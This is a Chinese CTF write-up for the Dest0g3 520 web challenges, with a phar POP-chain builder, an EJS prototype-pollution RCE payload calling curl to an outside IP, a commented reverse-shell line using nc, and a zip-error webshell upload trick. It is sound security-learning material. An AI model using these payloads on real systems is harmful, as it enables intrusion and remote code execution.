【Dest0g3 520迎新赛】web部分writeup

1NDEX

  • 0x00 前言
  • 0x01 简练wp
        • Phpdest
        • Easyphp
        • Simplerce
        • Easyssti
        • Pharpop
        • Funny_upload
        • Middle
        • Nodesoeasy
        • EZIP(赛后)
  • 0x02 rethink

0x00 前言

本来想着赛前练手的,没想到被练了…

0x01 简练wp

Phpdest

访问日志可包含
直接getshell
【Dest0g3 520迎新赛】web部分writeup_第1张图片

Easyphp

【Dest0g3 520迎新赛】web部分writeup_第2张图片

触发error直接得flag

Simplerce

【Dest0g3 520迎新赛】web部分writeup_第3张图片

进制编码绕过 str_ireplace

Easyssti

Fuzz一下几个主要的blacklist
【Dest0g3 520迎新赛】web部分writeup_第4张图片

参考
https://xz.aliyun.com/t/9584#toc-32
【Dest0g3 520迎新赛】web部分writeup_第5张图片

0c过一下空格
【Dest0g3 520迎新赛】web部分writeup_第6张图片

Pharpop

__destruct变量销毁会等程序运行完
但是有throw new error 利用php gc强制回收
浅析GC回收机制与phar反序列化 | Arsene.Tang (arsenetang.com)
理一下链子思路
D类用来写phar包与触发反序列化
__destruct入口点tree类起手
Air类进行目的实现
【Dest0g3 520迎新赛】web部分writeup_第7张图片

利用php原生类
DirectoryIterator进行flag文件名根目录匹配
SplFileObject进行读取
Pop:

$b = new tree();
$b->name=new apple();
$b->name->xxx=new air();
// $b->name->flag="glob:///f*";
$b->name->flag="/fflaggg";
$b->name->xxx->p=new banana();
// $b->name->xxx->p->act="DirectoryIterator";
$b->name->xxx->p->act="SplFileObject";

$c[]=$b;
$c[]=1;
// echo(serialize($a));
// class Mysql{
//     public $conn=;

// }
    @unlink("2.phar.tar.gz");
    @unlink("2.phar");
    $phar = new Phar("2.phar"); //后缀名必须为phar
    // $phar = $phar->convertToExecutable(Phar::TAR, Phar::GZ); //压缩规避敏感字符
    $phar->startBuffering();
    $phar->setStub("GIF89a".""); //设置stub
    
    
   
    // $o->code="system('nc 1.15.67.48 7777 -e /bin/sh');";
    $phar->setMetadata($c); //将自定义的meta-data存入manifest
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件
    //签名自动计算
    $phar->stopBuffering();
    // phar生成

【Dest0g3 520迎新赛】web部分writeup_第8张图片

Funny_upload

传个.htaccess
data://没用成功
后面上去看了一下配置里include没开
回头再本地试试
【Dest0g3 520迎新赛】web部分writeup_第9张图片

Shell.txt直接传个base64_encode的马
蚁剑直接连

Middle

原题
【Dest0g3 520迎新赛】web部分writeup_第10张图片

Pker生成opcode
【Dest0g3 520迎新赛】web部分writeup_第11张图片

就在根目录
【Dest0g3 520迎新赛】web部分writeup_第12张图片

Nodesoeasy

Ejs模板引擎的原型链污染
网上很多poc

{"__proto__":{"client":true,"escapeFunction":"1; return global.process.mainModule.constructor._load('child_process').execSync('curl  http://1.15.67.48');","compileDebug":true}}  

【Dest0g3 520迎新赛】web部分writeup_第13张图片

反弹shell直接拿flag

EZIP(赛后)

在这里插入代码片

fuzz了一天没想到源码藏在se图里…

Oh you find key:dXBsb2FkLnBocDoKPD9waHAKZXJyb3JfcmVwb3J0aW5nKDApOwppbmNsdWRlKCJ6aXAucGhwIik7CmlmKGlzc2V0KCRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSl7CiAgICBpZihzdHJzdHIoJF9GSUxFU1snZmlsZSddWyduYW1lJ10sIi4uIil8fHN0cnN0cigkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSwiLyIpKXsKICAgICAgICBlY2hvICJoYWNrZXIhISI7CiAgICAgICAgZXhpdDsKICAgIH0KICAgIGlmKHBhdGhpbmZvKCRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddLCBQQVRISU5GT19FWFRFTlNJT04pIT0iemlwIil7CiAgICAgICAgZWNobyAib25seSB6aXAhISI7CiAgICAgICAgZXhpdDsKICAgIH0KICAgICRNeXppcCA9IG5ldyB6aXAoJF9GSUxFU1snZmlsZSddWyduYW1lJ10pOwogICAgbWtkaXIoJE15emlwLT5wYXRoKTsKICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICcuLycuJE15emlwLT5wYXRoLicvJyAuICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKTsKICAgIGVjaG8gIlRyeSB0byB1bnppcCB5b3VyIHppcCB0byAvIi4kTXl6aXAtPnBhdGguIjxicj4iOwogICAgaWYoJE15emlwLT51bnppcCgpKXtlY2hvICJTdWNjZXNzIjt9ZWxzZXtlY2hvICJmYWlsZWQiO30KfQoKemlwLnBocDoKPD9waHAKY2xhc3MgemlwCnsKICAgIHB1YmxpYyAkemlwX25hbWU7CiAgICBwdWJsaWMgJHBhdGg7CiAgICBwdWJsaWMgJHppcF9tYW5hZ2VyOwoKICAgIHB1YmxpYyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgkemlwX25hbWUpewogICAgICAgICR0aGlzLT56aXBfbWFuYWdlciA9IG5ldyBaaXBBcmNoaXZlKCk7CiAgICAgICAgJHRoaXMtPnBhdGggPSAkdGhpcy0+Z2VuX3BhdGgoKTsKICAgICAgICAkdGhpcy0+emlwX25hbWUgPSAkemlwX25hbWU7CiAgICB9CiAgICBwdWJsaWMgZnVuY3Rpb24gZ2VuX3BhdGgoKXsKICAgICAgICAkY2hhcnM9ImFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVowMTIzNDU2Nzg5IjsKICAgICAgICAkbmV3Y2hhcnM9c3RyX3NwbGl0KCRjaGFycyk7CiAgICAgICAgc2h1ZmZsZSgkbmV3Y2hhcnMpOwogICAgICAgICRjaGFyc19rZXk9YXJyYXlfcmFuZCgkbmV3Y2hhcnMsMTUpOwogICAgICAgICRmbnN0ciA9ICIiOwogICAgICAgIGZvcigkaT0wOyRpPDE1OyRpKyspewogICAgICAgICAgICAkZm5zdHIuPSRuZXdjaGFyc1skY2hhcnNfa2V5WyRpXV07CiAgICAgICAgfQogICAgICAgIHJldHVybiBtZDUoJGZuc3RyLnRpbWUoKS5taWNyb3RpbWUoKSoxMDAwMDApOwogICAgfQoKICAgIHB1YmxpYyBmdW5jdGlvbiBkZWxkaXIoJGRpcikgewogICAgICAgIC8v5YWI5Yig6Zmk55uu5b2V5LiL55qE5paH5Lu277yaCiAgICAgICAgJGRoID0gb3BlbmRpcigkZGlyKTsKICAgICAgICB3aGlsZSAoJGZpbGUgPSByZWFkZGlyKCRkaCkpIHsKICAgICAgICAgICAgaWYoJGZpbGUgIT0gIi4iICYmICRmaWxlIT0iLi4iKSB7CiAgICAgICAgICAgICAgICAkZnVsbHBhdGggPSAkZGlyLiIvIi4kZmlsZTsKICAgICAgICAgICAgICAgIGlmKCFpc19kaXIoJGZ1bGxwYXRoKSkgewogICAgICAgICAgICAgICAgICAgIHVubGluaygkZnVsbHBhdGgpOwogICAgICAgICAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgICAgICAgICAkdGhpcy0+ZGVsZGlyKCRmdWxscGF0aCk7CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgY2xvc2VkaXIoJGRoKTsKICAgIH0KICAgIGZ1bmN0aW9uIGRpcl9saXN0KCRkaXJlY3RvcnkpCiAgICB7CiAgICAgICAgJGFycmF5ID0gW107CgogICAgICAgICRkaXIgPSBkaXIoJGRpcmVjdG9yeSk7CiAgICAgICAgd2hpbGUgKCRmaWxlID0gJGRpci0+cmVhZCgpKSB7CiAgICAgICAgICAgIGlmICgkZmlsZSAhPT0gJy4nICYmICRmaWxlICE9PSAnLi4nKSB7CiAgICAgICAgICAgICAgICAkYXJyYXlbXSA9ICRmaWxlOwogICAgICAgICAgICB9CiAgICAgICAgfQogICAgICAgIHJldHVybiAkYXJyYXk7CiAgICB9CiAgICBwdWJsaWMgZnVuY3Rpb24gdW56aXAoKQogICAgewogICAgICAgICRmdWxscGF0aCA9ICIvdmFyL3d3dy9odG1sLyIuJHRoaXMtPnBhdGguIi8iLiR0aGlzLT56aXBfbmFtZTsKICAgICAgICAkd2hpdGVfbGlzdCA9IFsnanBnJywncG5nJywnZ2lmJywnYm1wJ107CiAgICAgICAgJHRoaXMtPnppcF9tYW5hZ2VyLT5vcGVuKCRmdWxscGF0aCk7CiAgICAgICAgZm9yICgkaSA9IDA7JGkgPCAkdGhpcy0+emlwX21hbmFnZXItPmNvdW50KCk7JGkgKyspIHsKICAgICAgICAgICAgaWYgKHN0cnN0cigkdGhpcy0+emlwX21hbmFnZXItPmdldE5hbWVJbmRleCgkaSksIi4uLyIpKXsKICAgICAgICAgICAgICAgIGVjaG8gInlvdSBiYWQgYmFkIjsKICAgICAgICAgICAgICAgIHJldHVybiBmYWxzZTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgICAgICBpZighJHRoaXMtPnppcF9tYW5hZ2VyLT5leHRyYWN0VG8oJHRoaXMtPnBhdGgpKXsKICAgICAgICAgICAgZWNobyAiVW56aXAgdG8gLyIuJHRoaXMtPnBhdGguIi8gZmFpbGVkIjsKICAgICAgICAgICAgZXhpdDsKICAgICAgICB9CiAgICAgICAgQHVubGluaygkZnVsbHBhdGgpOwogICAgICAgICRmaWxlX2xpc3QgPSAkdGhpcy0+ZGlyX2xpc3QoIi92YXIvd3d3L2h0bWwvIi4kdGhpcy0+cGF0aC4iLyIpOwogICAgICAgIGZvcigkaT0wOyRpPHNpemVvZigkZmlsZV9saXN0KTskaSsrKXsKICAgICAgICAgICAgaWYoaXNfZGlyKCR0aGlzLT5wYXRoLiIvIi4kZmlsZV9saXN0WyRpXSkpewogICAgICAgICAgICAgICAgZWNobyAiZGlyPyBJIGRlbGV0ZWQgYWxsIHRoaW5ncyBpbiBpdCIuIjxicj4iO0AkdGhpcy0+ZGVsZGlyKCIvdmFyL3d3dy9odG1sLyIuJHRoaXMtPnBhdGguIi8iLiRmaWxlX2xpc3RbJGldKTtAcm1kaXIoIi92YXIvd3d3L2h0bWwvIi4kdGhpcy0+cGF0aC4iLyIuJGZpbGVfbGlzdFskaV0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIGVsc2V7CiAgICAgICAgICAgICAgICBpZighaW5fYXJyYXkocGF0aGluZm8oJGZpbGVfbGlzdFskaV0sIFBBVEhJTkZPX0VYVEVOU0lPTiksJHdoaXRlX2xpc3QpKSB7ZWNobyAib25seSBpbWFnZSEhISBJIGRlbGV0ZWQgaXQgZm9yIHlvdSIuIjxicj4iO0B1bmxpbmsoIi92YXIvd3d3L2h0bWwvIi4kdGhpcy0+cGF0aC4iLyIuJGZpbGVfbGlzdFskaV0pO30KICAgICAgICAgICAgfQogICAgICAgIH0KICAgICAgICByZXR1cm4gdHJ1ZTsKCiAgICB9CgoKfQo=

upload.php:
<?php
error_reporting(0);
include("zip.php");
if(isset($_FILES['file']['name'])){
    if(strstr($_FILES['file']['name'],"..")||strstr($_FILES['file']['name'],"/")){
        echo "hacker!!";
        exit;
    }
    if(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION)!="zip"){
        echo "only zip!!";
        exit;
    }
    $Myzip = new zip($_FILES['file']['name']);
    mkdir($Myzip->path);
    move_uploaded_file($_FILES['file']['tmp_name'], './'.$Myzip->path.'/' . $_FILES['file']['name']);
    echo "Try to unzip your zip to /".$Myzip->path."
"
; if($Myzip->unzip()){echo "Success";}else{echo "failed";} } zip.php: <?php class zip { public $zip_name; public $path; public $zip_manager; public function __construct($zip_name){ $this->zip_manager = new ZipArchive(); $this->path = $this->gen_path(); $this->zip_name = $zip_name; } public function gen_path(){ $chars="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; $newchars=str_split($chars); shuffle($newchars); $chars_key=array_rand($newchars,15); $fnstr = ""; for($i=0;$i<15;$i++){ $fnstr.=$newchars[$chars_key[$i]]; } return md5($fnstr.time().microtime()*100000); } public function deldir($dir) { //先删除目录下的文件: $dh = opendir($dir); while ($file = readdir($dh)) { if($file != "." && $file!="..") { $fullpath = $dir."/".$file; if(!is_dir($fullpath)) { unlink($fullpath); } else { $this->deldir($fullpath); } } } closedir($dh); } function dir_list($directory) { $array = []; $dir = dir($directory); while ($file = $dir->read()) { if ($file !== '.' && $file !== '..') { $array[] = $file; } } return $array; } public function unzip() { $fullpath = "/var/www/html/".$this->path."/".$this->zip_name; $white_list = ['jpg','png','gif','bmp']; $this->zip_manager->open($fullpath); for ($i = 0;$i < $this->zip_manager->count();$i ++) { if (strstr($this->zip_manager->getNameIndex($i),"../")){ echo "you bad bad"; return false; } } if(!$this->zip_manager->extractTo($this->path)){ echo "Unzip to /".$this->path."/ failed"; exit; } @unlink($fullpath); $file_list = $this->dir_list("/var/www/html/".$this->path."/"); for($i=0;$i<sizeof($file_list);$i++){ if(is_dir($this->path."/".$file_list[$i])){ echo "dir? I deleted all things in it"."
"
;@$this->deldir("/var/www/html/".$this->path."/".$file_list[$i]);@rmdir("/var/www/html/".$this->path."/".$file_list[$i]); } else{ if(!in_array(pathinfo($file_list[$i], PATHINFO_EXTENSION),$white_list)) {echo "only image!!! I deleted it for you"."
"
;@unlink("/var/www/html/".$this->path."/".$file_list[$i]);} } } return true; } }

很菜审计了很久没想到代码层面能绕过(期待大佬wp等复现)
后来问的别的师傅通过unzip报错就行,当初也有这个思路但是不会实现…(果然人什么都要学的)
先写个正常webshell放php
然后压缩的时候创建一个同名目录(目录里随便放点东西)

touch password.php
zip -y pwn.zip password.php
rm password.php
mkdir password.php
echo 1 > ./password.php/1
zip -y pwn.zip password.php/1

可以看到虽然报错,但依旧解压成功了
【Dest0g3 520迎新赛】web部分writeup_第14张图片
nl
suid提权
【Dest0g3 520迎新赛】web部分writeup_第15张图片

0x02 rethink

好久没更了,还是要发一下
之后有空把后面的一起复现再发了
又被自己菜麻了,果然还是什么都不会…

你可能感兴趣的:(ctf,php,python,后端,网络安全,web)